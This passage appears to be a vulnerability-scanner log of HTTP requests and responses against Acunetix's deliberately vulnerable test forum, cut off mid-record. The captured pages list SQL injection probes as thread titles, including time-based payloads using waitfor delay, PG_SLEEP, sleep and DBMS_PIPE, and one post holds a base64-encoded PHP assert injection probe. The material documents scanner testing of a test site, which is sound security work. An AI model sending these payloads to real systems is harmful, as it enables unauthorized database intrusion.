AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=42'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:53 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=43'>-1" OR 2+781-781-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=44'>-1" OR 3+781-781-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:54 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=45'>-1" OR 3*2<(0+5+781-781) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:54 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=46'>-1" OR 3*2>(0+5+781-781) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:54 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=47'>1 waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:55 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=48'>UGrs47CJ'; waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:55 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=49'>KHr20UMM'); waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:55 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=50'>NebDWBkM')); waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:56 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=51'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))--</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:56 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=52'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))--</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:57 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=53'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))--</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:57 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=54'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:58 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=55'>if(now()=sysdate(),sleep(15),0)</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:59 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=56'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:15 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=57'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:22 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=58'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:23 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=59'>1'"</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:38 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=60'>1</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:42 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=61'>@@NiQ6e</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:43 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=62'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:49 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=63'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:15 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=64'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:15 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=65'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:16 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=66'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=67'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:17 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=68'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:18 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=69'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:19 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=70'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:19 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=71'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=72'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:20 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=73'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:21 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=74'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:22 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=75'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:38 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=76'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:54 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=77'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:54 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=78'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:01 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=79'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:01 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=80'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:02 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=81'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:05 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=82'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:06 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=83'>Mr.</a></div></td><td>1</td><td>sOdPqaAH</td><td>12/14/2022 3:23:34 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3077 |
Response Body - size: 3,077 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:35 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 2933 |
Response Body - size: 2,933 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4125 |
Response Body - size: 4,125 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4164 |
Response Body - size: 4,164 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 12345'"\'\");|]* </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/12345'"\'\");|]* </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>12345'"\'\");|]* - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4174 |
Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
